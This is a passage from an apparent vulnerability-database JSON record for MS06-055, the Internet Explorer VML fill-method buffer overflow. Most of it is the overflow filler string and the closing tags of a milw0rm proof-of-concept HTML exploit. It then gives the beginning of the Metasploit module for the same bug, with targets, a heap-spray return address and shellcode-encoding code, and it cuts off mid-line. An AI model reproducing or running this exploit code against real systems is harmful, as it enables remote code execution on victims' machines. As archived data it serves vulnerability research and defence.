ԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅԅ\" ></v:rect></v:fill></body>\r\n</html>\r\n \n# milw0rm.com [2006-09-24]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2425/"}], "metasploit": [{"lastseen": "2019-12-03T12:51:23", "bulletinFamily": "exploit", "description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.\n", "modified": "2017-07-24T13:26:21", "published": "2006-09-27T03:52:54", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS06_055_VML_METHOD", "href": "", "type": "metasploit", "title": "MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution',\n 'Description' => %q{\n This module exploits a code execution vulnerability in Microsoft Internet Explorer using\n a buffer overflow in the VML processing code (VGX.dll). This module has been tested on\n Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'hdm',\n 'Aviv Raff <avivra[at]gmail.com>',\n 'Trirat Puttaraksa (Kira) <trir00t[at]gmail.com>',\n 'Mr.Niega <Mr.Niega[at]gmail.com>',\n 'M. Shirk <shirkdog_list[at]hotmail.com>'\n ],\n 'References' =>\n [\n ['CVE', '2006-4868'],\n ['OSVDB', '28946'],\n ['MSB', 'MS06-055'],\n ['BID', '20096'],\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows NT 4.0 -> Windows 2003 SP1', {'Ret' => 0x0c0c0c0c} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 19 2006'))\n end\n\n def on_request_uri(cli, request)\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Determine the buffer length to use\n buflen = 1024\n if (request.headers['User-Agent'] =~ /Windows 5\\.[123]/)\n buflen = 65535\n end\n\n # Encode the shellcode\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Get a unicode friendly version of the return 